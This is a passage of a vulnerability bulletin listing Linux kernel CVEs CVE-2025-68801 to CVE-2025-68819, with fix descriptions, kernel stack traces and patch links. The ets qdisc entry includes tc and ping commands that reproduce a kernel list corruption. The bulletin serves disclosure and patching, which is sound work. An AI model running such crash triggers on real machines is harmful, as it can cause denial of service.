kvfree_call_rcu+0x93/0x5b0 mlxsw_sp_router_neigh_event_work+0x67d/0x860 process_one_work+0xd57/0x1390 worker_thread+0x4d6/0xd40 kthread+0x355/0x5b0 ret_from_fork+0x1d4/0x270 ret_from_fork_asm+0x11/0x20 | 2026-01-13 | not yet calculated | CVE-2025-68801 | https://git.kernel.org/stable/c/a2dfe6758fc63e542105bee8b17a3a7485684db0 https://git.kernel.org/stable/c/9e0a0d9eeb0dbeba2c83fa837885b19b8b9230fc https://git.kernel.org/stable/c/c437fbfd4382412598cdda1f8e2881b523668cc2 https://git.kernel.org/stable/c/4a3c569005f42ab5e5b2ad637132a33bf102cc08 https://git.kernel.org/stable/c/ed8141b206bdcfd5d0b92c90832eeb77b7a60a0a https://git.kernel.org/stable/c/675c5aeadf6472672c472dc0f26401e4fcfbf254 https://git.kernel.org/stable/c/8b0e69763ef948fb872a7767df4be665d18f5fd4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe: Limit num_syncs to prevent oversized allocations The exec and vm_bind ioctl allow userspace to specify an arbitrary num_syncs value. Without bounds checking, a very large num_syncs can force an excessively large allocation, leading to kernel warnings from the page allocator as below. Introduce DRM_XE_MAX_SYNCS (set to 1024) and reject any request exceeding this limit. " ------------[ cut here ]------------ WARNING: CPU: 0 PID: 1217 at mm/page_alloc.c:5124 __alloc_frozen_pages_noprof+0x2f8/0x2180 mm/page_alloc.c:5124 ... Call Trace: <TASK> alloc_pages_mpol+0xe4/0x330 mm/mempolicy.c:2416 ___kmalloc_large_node+0xd8/0x110 mm/slub.c:4317 __kmalloc_large_node_noprof+0x18/0xe0 mm/slub.c:4348 __do_kmalloc_node mm/slub.c:4364 [inline] __kmalloc_noprof+0x3d4/0x4b0 mm/slub.c:4388 kmalloc_noprof include/linux/slab.h:909 [inline] kmalloc_array_noprof include/linux/slab.h:948 [inline] xe_exec_ioctl+0xa47/0x1e70 drivers/gpu/drm/xe/xe_exec.c:158 drm_ioctl_kernel+0x1f1/0x3e0 drivers/gpu/drm/drm_ioctl.c:797 drm_ioctl+0x5e7/0xc50 drivers/gpu/drm/drm_ioctl.c:894 xe_drm_ioctl+0x10b/0x170 drivers/gpu/drm/xe/xe_device.c:224 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:598 [inline] __se_sys_ioctl fs/ioctl.c:584 [inline] __x64_sys_ioctl+0x18b/0x210 fs/ioctl.c:584 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xbb/0x380 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f ... " v2: Add "Reported-by" and Cc stable kernels. v3: Change XE_MAX_SYNCS from 64 to 1024. (Matt & Ashutosh) v4: s/XE_MAX_SYNCS/DRM_XE_MAX_SYNCS/ (Matt) v5: Do the check at the top of the exec func. (Matt) (cherry picked from commit b07bac9bd708ec468cd1b8a5fe70ae2ac9b0a11c) | 2026-01-13 | not yet calculated | CVE-2025-68802 | https://git.kernel.org/stable/c/e281d1fd6903a081ef023c341145ae92258e38d2 https://git.kernel.org/stable/c/1d200017f55f829b9e376093bd31dfbec92081de https://git.kernel.org/stable/c/8e461304009135270e9ccf2d7e2dfe29daec9b60 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: NFSD: NFSv4 file creation neglects setting ACL An NFSv4 client that sets an ACL with a named principal during file creation retrieves the ACL afterwards, and finds that it is only a default ACL (based on the mode bits) and not the ACL that was requested during file creation. This violates RFC 8881 section 6.4.1.3: "the ACL attribute is set as given". The issue occurs in nfsd_create_setattr(), which calls nfsd_attrs_valid() to determine whether to call nfsd_setattr(). However, nfsd_attrs_valid() checks only for iattr changes and security labels, but not POSIX ACLs. When only an ACL is present, the function returns false, nfsd_setattr() is skipped, and the POSIX ACL is never applied to the inode. Subsequently, when the client retrieves the ACL, the server finds no POSIX ACL on the inode and returns one generated from the file's mode bits rather than returning the originally-specified ACL. | 2026-01-13 | not yet calculated | CVE-2025-68803 | https://git.kernel.org/stable/c/c182e1e0b7640f6bcc0c5ca8d473f7c57199ea3d https://git.kernel.org/stable/c/75f91534f9acdfef77f8fa094313b7806f801725 https://git.kernel.org/stable/c/60dbdef2ebc2317266a385e4debdb1bb0e57afe1 https://git.kernel.org/stable/c/381261f24f4e4b41521c0e5ef5cc0b9a786a9862 https://git.kernel.org/stable/c/bf4e671c651534a307ab2fabba4926116beef8c3 https://git.kernel.org/stable/c/214b396480061cbc8b16f2c518b2add7fbfa5192 https://git.kernel.org/stable/c/913f7cf77bf14c13cfea70e89bcb6d0b22239562 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: platform/chrome: cros_ec_ishtp: Fix UAF after unbinding driver After unbinding the driver, another kthread `cros_ec_console_log_work` is still accessing the device, resulting in a UAF and crash. The driver doesn't unregister the EC device in .remove(), which should shut down sub-devices synchronously. Fix it. | 2026-01-13 | not yet calculated | CVE-2025-68804 | https://git.kernel.org/stable/c/27037916db38e6b78a0242031d3b93d997b84020 https://git.kernel.org/stable/c/e1da6e399df976dd04c7c73ec008bc81da368a95 https://git.kernel.org/stable/c/8dc1f5a85286290dbf04dd5951d020570f49779b https://git.kernel.org/stable/c/393b8f9bedc7806acb9c47cefdbdb223b4b6164b https://git.kernel.org/stable/c/4701493ba37654b3c38b526f6591cf0b02aa172f https://git.kernel.org/stable/c/24a2062257bbdfc831de5ed21c27b04b5bdf2437 https://git.kernel.org/stable/c/944edca81e7aea15f83cf9a13a6ab67f711e8abd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fuse: fix io-uring list corruption for terminated non-committed requests When a request is terminated before it has been committed, the request is not removed from the queue's list. This leaves a dangling list entry that leads to list corruption and use-after-free issues. Remove the request from the queue's list for terminated non-committed requests. | 2026-01-13 | not yet calculated | CVE-2025-68805 | https://git.kernel.org/stable/c/a6d1f1ace16d0e777a85f84267160052d3499b6e https://git.kernel.org/stable/c/95c39eef7c2b666026c69ab5b30471da94ea2874 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix buffer validation by including null terminator size in EA length The smb2_set_ea function, which handles Extended Attributes (EA), was performing buffer validation checks that incorrectly omitted the size of the null terminating character (+1 byte) for EA Name. This patch fixes the issue by explicitly adding '+ 1' to EaNameLength where the null terminator is expected to be present in the buffer, ensuring the validation accurately reflects the total required buffer size. | 2026-01-13 | not yet calculated | CVE-2025-68806 | https://git.kernel.org/stable/c/cae52c592a07e1d3fa3338a5f064a374a5f26750 https://git.kernel.org/stable/c/a28a375a5439eb474e9f284509a407efb479c925 https://git.kernel.org/stable/c/d26af6d14da43ab92d07bc60437c62901dc522e6 https://git.kernel.org/stable/c/6dc8cf6e7998ef7aeb9383a4c2904ea5d22fa2e4 https://git.kernel.org/stable/c/95d7a890e4b03e198836d49d699408fd1867cb55 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: block: fix race between wbt_enable_default and IO submission When wbt_enable_default() is moved out of queue freezing in elevator_change(), it can cause the wbt inflight counter to become negative (-1), leading to hung tasks in the writeback path. Tasks get stuck in wbt_wait() because the counter is in an inconsistent state. The issue occurs because wbt_enable_default() could race with IO submission, allowing the counter to be decremented before proper initialization. This manifests as: rq_wait[0]: inflight: -1 has_waiters: True rwb_enabled() checks the state, which can be updated exactly between wbt_wait() (rq_qos_throttle()) and wbt_track()(rq_qos_track()), then the inflight counter will become negative. And results in hung task warnings like: task:kworker/u24:39 state:D stack:0 pid:14767 Call Trace: rq_qos_wait+0xb4/0x150 wbt_wait+0xa9/0x100 __rq_qos_throttle+0x24/0x40 blk_mq_submit_bio+0x672/0x7b0 ... Fix this by: 1. Splitting wbt_enable_default() into: - __wbt_enable_default(): Returns true if wbt_init() should be called - wbt_enable_default(): Wrapper for existing callers (no init) - wbt_init_enable_default(): New function that checks and inits WBT 2. Using wbt_init_enable_default() in blk_register_queue() to ensure proper initialization during queue registration 3. Move wbt_init() out of wbt_enable_default() which is only for enabling disabled wbt from bfq and iocost, and wbt_init() isn't needed. Then the original lock warning can be avoided. 4. Removing the ELEVATOR_FLAG_ENABLE_WBT_ON_EXIT flag and its handling code since it's no longer needed This ensures WBT is properly initialized before any IO can be submitted, preventing the counter from going negative. | 2026-01-13 | not yet calculated | CVE-2025-68807 | https://git.kernel.org/stable/c/f55201fb3becff6a903fd29f4d1147cc7e91eb0c https://git.kernel.org/stable/c/9869d3a6fed381f3b98404e26e1afc75d680cbf9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: vidtv: initialize local pointers upon transfer of memory ownership vidtv_channel_si_init() creates a temporary list (program, service, event) and ownership of the memory itself is transferred to the PAT/SDT/EIT tables through vidtv_psi_pat_program_assign(), vidtv_psi_sdt_service_assign(), vidtv_psi_eit_event_assign(). The problem here is that the local pointer where the memory ownership transfer was completed is not initialized to NULL. This causes the vidtv_psi_pmt_create_sec_for_each_pat_entry() function to fail, and in the flow that jumps to free_eit, the memory that was freed by vidtv_psi_*_table_destroy() can be accessed again by vidtv_psi_*_event_destroy() due to the uninitialized local pointer, so it is freed once again. Therefore, to prevent use-after-free and double-free vulnerability, local pointers must be initialized to NULL when transferring memory ownership. | 2026-01-13 | not yet calculated | CVE-2025-68808 | https://git.kernel.org/stable/c/c342e294dac4988c8ada759b2f057246e48c5108 https://git.kernel.org/stable/c/12ab6ebb37789b84073e83e4d9b14a5e0d133323 https://git.kernel.org/stable/c/3caa18d35f1dabe85a3dd31bc387f391ac9f9b4e https://git.kernel.org/stable/c/fb9bd6d8d314b748e946ed6555eb4a956ee8c4d8 https://git.kernel.org/stable/c/a69c7fd603bf5ad93177394fbd9711922ee81032 https://git.kernel.org/stable/c/30f4d4e5224a9e44e9ceb3956489462319d804ce https://git.kernel.org/stable/c/98aabfe2d79f74613abc2b0b1cef08f97eaf5322 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: vfs: fix race on m_flags in vfs_cache ksmbd maintains delete-on-close and pending-delete state in ksmbd_inode->m_flags. In vfs_cache.c this field is accessed under inconsistent locking: some paths read and modify m_flags under ci->m_lock while others do so without taking the lock at all. Examples: - ksmbd_query_inode_status() and __ksmbd_inode_close() use ci->m_lock when checking or updating m_flags. - ksmbd_inode_pending_delete(), ksmbd_set_inode_pending_delete(), ksmbd_clear_inode_pending_delete() and ksmbd_fd_set_delete_on_close() used to read and modify m_flags without ci->m_lock. This creates a potential data race on m_flags when multiple threads open, close and delete the same file concurrently. In the worst case delete-on-close and pending-delete bits can be lost or observed in an inconsistent state, leading to confusing delete semantics (files that stay on disk after delete-on-close, or files that disappear while still in use). Fix it by: - Making ksmbd_query_inode_status() look at m_flags under ci->m_lock after dropping inode_hash_lock. - Adding ci->m_lock protection to all helpers that read or modify m_flags (ksmbd_inode_pending_delete(), ksmbd_set_inode_pending_delete(), ksmbd_clear_inode_pending_delete(), ksmbd_fd_set_delete_on_close()). - Keeping the existing ci->m_lock protection in __ksmbd_inode_close(), and moving the actual unlink/xattr removal outside the lock. This unifies the locking around m_flags and removes the data race while preserving the existing delete-on-close behaviour. | 2026-01-13 | not yet calculated | CVE-2025-68809 | https://git.kernel.org/stable/c/5adad9727a815c26013b0d41cfee92ffa7d4037c https://git.kernel.org/stable/c/ccc78781041589ea383e61d5d7a1e9a31b210b93 https://git.kernel.org/stable/c/ee63729760f5b61a66f345c54dc4c7514e62383d https://git.kernel.org/stable/c/991f8a79db99b14c48d20d2052c82d65b9186cad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: Disallow toggling KVM_MEM_GUEST_MEMFD on an existing memslot Reject attempts to disable KVM_MEM_GUEST_MEMFD on a memslot that was initially created with a guest_memfd binding, as KVM doesn't support toggling KVM_MEM_GUEST_MEMFD on existing memslots. KVM prevents enabling KVM_MEM_GUEST_MEMFD, but doesn't prevent clearing the flag. Failure to reject the new memslot results in a use-after-free due to KVM not unbinding from the guest_memfd instance. Unbinding on a FLAGS_ONLY change is easy enough, and can/will be done as a hardening measure (in anticipation of KVM supporting dirty logging on guest_memfd at some point), but fixing the use-after-free would only address the immediate symptom. ================================================================== BUG: KASAN: slab-use-after-free in kvm_gmem_release+0x362/0x400 [kvm] Write of size 8 at addr ffff8881111ae908 by task repro/745 CPU: 7 UID: 1000 PID: 745 Comm: repro Not tainted 6.18.0-rc6-115d5de2eef3-next-kasan #3 NONE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015 Call Trace: <TASK> dump_stack_lvl+0x51/0x60 print_report+0xcb/0x5c0 kasan_report+0xb4/0xe0 kvm_gmem_release+0x362/0x400 [kvm] __fput+0x2fa/0x9d0 task_work_run+0x12c/0x200 do_exit+0x6ae/0x2100 do_group_exit+0xa8/0x230 __x64_sys_exit_group+0x3a/0x50 x64_sys_call+0x737/0x740 do_syscall_64+0x5b/0x900 entry_SYSCALL_64_after_hwframe+0x4b/0x53 RIP: 0033:0x7f581f2eac31 </TASK> Allocated by task 745 on cpu 6 at 9.746971s: kasan_save_stack+0x20/0x40 kasan_save_track+0x13/0x50 __kasan_kmalloc+0x77/0x90 kvm_set_memory_region.part.0+0x652/0x1110 [kvm] kvm_vm_ioctl+0x14b0/0x3290 [kvm] __x64_sys_ioctl+0x129/0x1a0 do_syscall_64+0x5b/0x900 entry_SYSCALL_64_after_hwframe+0x4b/0x53 Freed by task 745 on cpu 6 at 9.747467s: kasan_save_stack+0x20/0x40 kasan_save_track+0x13/0x50 __kasan_save_free_info+0x37/0x50 __kasan_slab_free+0x3b/0x60 kfree+0xf5/0x440 kvm_set_memslot+0x3c2/0x1160 [kvm] kvm_set_memory_region.part.0+0x86a/0x1110 [kvm] kvm_vm_ioctl+0x14b0/0x3290 [kvm] __x64_sys_ioctl+0x129/0x1a0 do_syscall_64+0x5b/0x900 entry_SYSCALL_64_after_hwframe+0x4b/0x53 | 2026-01-13 | not yet calculated | CVE-2025-68810 | https://git.kernel.org/stable/c/89dbbe6ff323fc34659621a577fe0af913f47386 https://git.kernel.org/stable/c/cb51bef465d8ec60a968507330e01020e35dc127 https://git.kernel.org/stable/c/9935df5333aa503a18de5071f53762b65c783c4c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: svcrdma: use rc_pageoff for memcpy byte offset svc_rdma_copy_inline_range added rc_curpage (page index) to the page base instead of the byte offset rc_pageoff. Use rc_pageoff so copies land within the current page. Found by ZeroPath (https://zeropath.com) | 2026-01-13 | not yet calculated | CVE-2025-68811 | https://git.kernel.org/stable/c/e8623e9c451e23d84b870811f42fd872b4089ef6 https://git.kernel.org/stable/c/2a77c8dd49bccf0ca232be7c836cec1209abb8da https://git.kernel.org/stable/c/a8ee9099f30654917aa68f55d707b5627e1dbf77 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: iris: Add sanity check for stop streaming Add sanity check in iris_vb2_stop_streaming. If inst->state is already IRIS_INST_ERROR, we should skip the stream_off operation because it would still send packets to the firmware. In iris_kill_session, inst->state is set to IRIS_INST_ERROR and session_close is executed, which will kfree(inst_hfi_gen2->packet). If stop_streaming is called afterward, it will cause a crash. [bod: remove qcom from patch title] | 2026-01-13 | not yet calculated | CVE-2025-68812 | https://git.kernel.org/stable/c/f8b136296722e258ec43237a35f72c92a6d4501a https://git.kernel.org/stable/c/ad699fa78b59241c9d71a8cafb51525f3dab04d4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipvs: fix ipv4 null-ptr-deref in route error path The IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure() without ensuring skb->dev is set, leading to a NULL pointer dereference in fib_compute_spec_dst() when ipv4_link_failure() attempts to send ICMP destination unreachable messages. The issue emerged after commit ed0de45a1008 ("ipv4: recompile ip options in ipv4_link_failure") started calling __ip_options_compile() from ipv4_link_failure(). This code path eventually calls fib_compute_spec_dst() which dereferences skb->dev. An attempt was made to fix the NULL skb->dev dereference in commit 0113d9c9d1cc ("ipv4: fix null-deref in ipv4_link_failure"), but it only addressed the immediate dev_net(skb->dev) dereference by using a fallback device. The fix was incomplete because fib_compute_spec_dst() later in the call chain still accesses skb->dev directly, which remains NULL when IPVS calls dst_link_failure(). The crash occurs when: 1. IPVS processes a packet in NAT mode with a misconfigured destination 2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route 3. The error path calls dst_link_failure(skb) with skb->dev == NULL 4. ipv4_link_failure() → ipv4_send_dest_unreach() → __ip_options_compile() → fib_compute_spec_dst() 5. fib_compute_spec_dst() dereferences NULL skb->dev Apply the same fix used for IPv6 in commit 326bf17ea5d4 ("ipvs: fix ipv6 route unreach panic"): set skb->dev from skb_dst(skb)->dev before calling dst_link_failure(). KASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f] CPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2 RIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233 RIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285 Call Trace: <TASK> spec_dst_fill net/ipv4/ip_options.c:232 spec_dst_fill net/ipv4/ip_options.c:229 __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330 ipv4_send_dest_unreach net/ipv4/route.c:1252 ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265 dst_link_failure include/net/dst.h:437 __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412 ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764 | 2026-01-13 | not yet calculated | CVE-2025-68813 | https://git.kernel.org/stable/c/dd72a93c80408f06327dd2d956eb1a656d0b5903 https://git.kernel.org/stable/c/312d7cd88882fc6cadcc08b02287497aaaf94bcd https://git.kernel.org/stable/c/cdeff10851c37a002d87a035818ebd60fdb74447 https://git.kernel.org/stable/c/4729ff0581fbb7ad098b6153b76b6f5aac94618a https://git.kernel.org/stable/c/25ab24df31f7af843c96a38e0781b9165216e1a8 https://git.kernel.org/stable/c/689a627d14788ad772e0fa24c2e57a23dbc7ce90 https://git.kernel.org/stable/c/ad891bb3d079a46a821bf2b8867854645191bab0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring: fix filename leak in __io_openat_prep() __io_openat_prep() allocates a struct filename using getname(). However, for the condition of the file being installed in the fixed file table as well as having O_CLOEXEC flag set, the function returns early. At that point, the request doesn't have REQ_F_NEED_CLEANUP flag set. Due to this, the memory for the newly allocated struct filename is not cleaned up, causing a memory leak. Fix this by setting the REQ_F_NEED_CLEANUP for the request just after the successful getname() call, so that when the request is torn down, the filename will be cleaned up, along with other resources needing cleanup. | 2026-01-13 | not yet calculated | CVE-2025-68814 | https://git.kernel.org/stable/c/2420ef01b2e836fbc05a0a8c73a1016504eb0458 https://git.kernel.org/stable/c/8f44c4a550570cd5903625133f938c6b51310c9b https://git.kernel.org/stable/c/18b99fa603d0df5e1c898699c17d3b92ddc80746 https://git.kernel.org/stable/c/e232269d511566b1f80872256a48593acc1becf4 https://git.kernel.org/stable/c/7fbfb85b05bc960cc50e09d03e5e562131e48d45 https://git.kernel.org/stable/c/b14fad555302a2104948feaff70503b64c80ac01 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: ets: Remove drr class from the active list if it changes to strict Whenever a user issues an ets qdisc change command, transforming a drr class into a strict one, the ets code isn't checking whether that class was in the active list and removing it. This means that, if a user changes a strict class (which was in the active list) back to a drr one, that class will be added twice to the active list [1]. Doing so with the following commands: tc qdisc add dev lo root handle 1: ets bands 2 strict 1 tc qdisc add dev lo parent 1:2 handle 20: \ tbf rate 8bit burst 100b latency 1s tc filter add dev lo parent 1: basic classid 1:2 ping -c1 -W0.01 -s 56 127.0.0.1 tc qdisc change dev lo root handle 1: ets bands 2 strict 2 tc qdisc change dev lo root handle 1: ets bands 2 strict 1 ping -c1 -W0.01 -s 56 127.0.0.1 Will trigger the following splat with list debug turned on: [ 59.279014][ T365] ------------[ cut here ]------------ [ 59.279452][ T365] list_add double add: new=ffff88801d60e350, prev=ffff88801d60e350, next=ffff88801d60e2c0. [ 59.280153][ T365] WARNING: CPU: 3 PID: 365 at lib/list_debug.c:35 __list_add_valid_or_report+0x17f/0x220 [ 59.280860][ T365] Modules linked in: [ 59.281165][ T365] CPU: 3 UID: 0 PID: 365 Comm: tc Not tainted 6.18.0-rc7-00105-g7e9f13163c13-dirty #239 PREEMPT(voluntary) [ 59.281977][ T365] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 [ 59.282391][ T365] RIP: 0010:__list_add_valid_or_report+0x17f/0x220 [ 59.282842][ T365] Code: 89 c6 e8 d4 b7 0d ff 90 0f 0b 90 90 31 c0 e9 31 ff ff ff 90 48 c7 c7 e0 a0 22 9f 48 89 f2 48 89 c1 4c 89 c6 e8 b2 b7 0d ff 90 <0f> 0b 90 90 31 c0 e9 0f ff ff ff 48 89 f7 48 89 44 24 10 4c 89 44 ... [ 59.288812][ T365] Call Trace: [ 59.289056][ T365] <TASK> [ 59.289224][ T365] ? srso_alias_return_thunk+0x5/0xfbef5 [ 59.289546][ T365] ets_qdisc_change+0xd2b/0x1e80 [ 59.289891][ T365] ? __lock_acquire+0x7e7/0x1be0 [ 59.290223][ T365] ? __pfx_ets_qdisc_change+0x10/0x10 [ 59.290546][ T365] ? srso_alias_return_thunk+0x5/0xfbef5 [ 59.290898][ T365] ? __mutex_trylock_common+0xda/0x240 [ 59.291228][ T365] ? __pfx___mutex_trylock_common+0x10/0x10 [ 59.291655][ T365] ? srso_alias_return_thunk+0x5/0xfbef5 [ 59.291993][ T365] ? srso_alias_return_thunk+0x5/0xfbef5 [ 59.292313][ T365] ? trace_contention_end+0xc8/0x110 [ 59.292656][ T365] ? srso_alias_return_thunk+0x5/0xfbef5 [ 59.293022][ T365] ? srso_alias_return_thunk+0x5/0xfbef5 [ 59.293351][ T365] tc_modify_qdisc+0x63a/0x1cf0 Fix this by always checking and removing an ets class from the active list when changing it to strict. [1] https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/tree/net/sched/sch_ets.c?id=ce052b9402e461a9aded599f5b47e76bc727f7de#n663 | 2026-01-13 | not yet calculated | CVE-2025-68815 | https://git.kernel.org/stable/c/58fdce6bc005e964f1dbc3ca716f5fe0f68839a2 https://git.kernel.org/stable/c/02783a37cb1c0a2bd9fcba4ff1b81e6e209c7d87 https://git.kernel.org/stable/c/8067db5c95aab9461d23117679338cd8869831fa https://git.kernel.org/stable/c/2f125ebe47d6369e562f3cbd9b6227cff51eaf34 https://git.kernel.org/stable/c/cca2ed931b734fe48139bc6f020e47367346630f https://git.kernel.org/stable/c/43d9a530c8c094d137159784e7c951c65f11ec6c https://git.kernel.org/stable/c/b1e125ae425aba9b45252e933ca8df52a843ec70 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: fw_tracer, Validate format string parameters Add validation for format string parameters in the firmware tracer to prevent potential security vulnerabilities and crashes from malformed format strings received from firmware. The firmware tracer receives format strings from the device firmware and uses them to format trace messages. Without proper validation, bad firmware could provide format strings with invalid format specifiers (e.g., %s, %p, %n) that could lead to crashes, or other undefined behavior. Add mlx5_tracer_validate_params() to validate that all format specifiers in trace strings are limited to safe integer/hex formats (%x, %d, %i, %u, %llx, %lx, etc.). Reject strings containing other format types that could be used to access arbitrary memory or cause crashes. Invalid format strings are added to the trace output for visibility with "BAD_FORMAT: " prefix. | 2026-01-13 | not yet calculated | CVE-2025-68816 | https://git.kernel.org/stable/c/95624b731c490a4b849844269193a233d6d556a0 https://git.kernel.org/stable/c/768d559f466cdd72849110a7ecd76a21d52dcfe3 https://git.kernel.org/stable/c/38ac688b52ef26a88f8bc4fe26d24fdd0ff91e5d https://git.kernel.org/stable/c/8ac688c0e430dab19f6a9b70df94b1f635612c1a https://git.kernel.org/stable/c/45bd283b1d69e2c97cddcb9956f0e0261fc4efd7 https://git.kernel.org/stable/c/8c35c2448086870509ede43947845be0833251f0 https://git.kernel.org/stable/c/b35966042d20b14e2d83330049f77deec5229749 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix use-after-free in ksmbd_tree_connect_put under concurrency Under high concurrency, a tree-connection object (tcon) is freed on a disconnect path while another path still holds a reference and later executes *_put()/write on it. | 2026-01-13 | not yet calculated | CVE-2025-68817 | https://git.kernel.org/stable/c/d092de8a26c952379ded8e6b0bda31d89befac1a https://git.kernel.org/stable/c/d64977495e44855f2b28d8ce56107c963a7a50e4 https://git.kernel.org/stable/c/21a3d01fc6db5129f81edb0ab7cb94fd758bcbea https://git.kernel.org/stable/c/063cbbc6f595ea36ad146e1b7d2af820894beb21 https://git.kernel.org/stable/c/b39a1833cc4a2755b02603eec3a71a85e9dff926 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: Revert "scsi: qla2xxx: Perform lockless command completion in abort path" This reverts commit 0367076b0817d5c75dfb83001ce7ce5c64d803a9. The commit being reverted added code to __qla2x00_abort_all_cmds() to call sp->done() without holding a spinlock. But unlike the older code below it, this new code failed to check sp->cmd_type and just assumed TYPE_SRB, which results in a jump to an invalid pointer in target-mode with TYPE_TGT_CMD: qla2xxx [0000:65:00.0]-d034:8: qla24xx_do_nack_work create sess success 0000000009f7a79b qla2xxx [0000:65:00.0]-5003:8: ISP System Error - mbx1=1ff5h mbx2=10h mbx3=0h mbx4=0h mbx5=191h mbx6=0h mbx7=0h. qla2xxx [0000:65:00.0]-d01e:8: -> fwdump no buffer qla2xxx [0000:65:00.0]-f03a:8: qla_target(0): System error async event 0x8002 occurred qla2xxx [0000:65:00.0]-00af:8: Performing ISP error recovery - ha=0000000058183fda. BUG: kernel NULL pointer dereference, address: 0000000000000000 PF: supervisor instruction fetch in kernel mode PF: error_code(0x0010) - not-present page PGD 0 P4D 0 Oops: 0010 [#1] SMP CPU: 2 PID: 9446 Comm: qla2xxx_8_dpc Tainted: G O 6.1.133 #1 Hardware name: Supermicro Super Server/X11SPL-F, BIOS 4.2 12/15/2023 RIP: 0010:0x0 Code: Unable to access opcode bytes at 0xffffffffffffffd6. RSP: 0018:ffffc90001f93dc8 EFLAGS: 00010206 RAX: 0000000000000282 RBX: 0000000000000355 RCX: ffff88810d16a000 RDX: ffff88810dbadaa8 RSI: 0000000000080000 RDI: ffff888169dc38c0 RBP: ffff888169dc38c0 R08: 0000000000000001 R09: 0000000000000045 R10: ffffffffa034bdf0 R11: 0000000000000000 R12: ffff88810800bb40 R13: 0000000000001aa8 R14: ffff888100136610 R15: ffff8881070f7400 FS: 0000000000000000(0000) GS:ffff88bf80080000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffffffffffffffd6 CR3: 000000010c8ff006 CR4: 00000000003706e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> ? __die+0x4d/0x8b ? page_fault_oops+0x91/0x180 ? trace_buffer_unlock_commit_regs+0x38/0x1a0 ? exc_page_fault+0x391/0x5e0 ? asm_exc_page_fault+0x22/0x30 __qla2x00_abort_all_cmds+0xcb/0x3e0 [qla2xxx_scst] qla2x00_abort_all_cmds+0x50/0x70 [qla2xxx_scst] qla2x00_abort_isp_cleanup+0x3b7/0x4b0 [qla2xxx_scst] qla2x00_abort_isp+0xfd/0x860 [qla2xxx_scst] qla2x00_do_dpc+0x581/0xa40 [qla2xxx_scst] kthread+0xa8/0xd0 </TASK> Then commit 4475afa2646d ("scsi: qla2xxx: Complete command early within lock") added the spinlock back, because not having the lock caused a race and a crash. But qla2x00_abort_srb() in the switch below already checks for qla2x00_chip_is_down() and handles it the same way, so the code above the switch is now redundant and still buggy in target-mode. Remove it. | 2026-01-13 | not yet calculated | CVE-2025-68818 | https://git.kernel.org/stable/c/b04b3733fff7e94566386b962e4795550fbdfd3d https://git.kernel.org/stable/c/50b097d92c99f718831b8b349722bc79f718ba1b https://git.kernel.org/stable/c/c5c37a821bd1708f26a9522b4a6f47b9f7a20003 https://git.kernel.org/stable/c/e9e601b7df58ba0c667baf30263331df2c02ffe1 https://git.kernel.org/stable/c/b10ebbfd59a535c8d22f4ede6e8389622ce98dc0 https://git.kernel.org/stable/c/1c728951bc769b795d377852eae1abddad88635d https://git.kernel.org/stable/c/b57fbc88715b6d18f379463f48a15b560b087ffe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg() rlen value is a user-controlled value, but dtv5100_i2c_msg() does not check the size of the rlen value. Therefore, if it is set to a value larger than sizeof(st->data), an out-of-bounds vuln occurs for st->data. Therefore, we need to add proper range checking to prevent this vuln. | 2026-01-13 | not yet calculated | CVE-2025-68819 | https://git.kernel.org/stable/c/c2c293ea7b61f12cdaad1e99a5b4efc58c88960a https://git.kernel.org/stable/c/c2305b4c5fc15e20ac06c35738e0578eb4323750 https://git.kernel.org/stable/c/61f214a878e96e2a8750bf96a98f78c658dba60c https://git.kernel.org/stable/c/4a54d8fcb093761e4c56eb211cf4e39bf8401fa1 https://git.kernel.org/stable/c/fe3e129ab49806aaaa3f22067ebc75c2dfbe4658 https://git.kernel.org/stable/c/ac92151ff2494130d9fc686055d6bbb9743a673e https://git.kernel.org/stable/c/b91e6aafe8d356086cc621bc03e35ba2299e4788 |
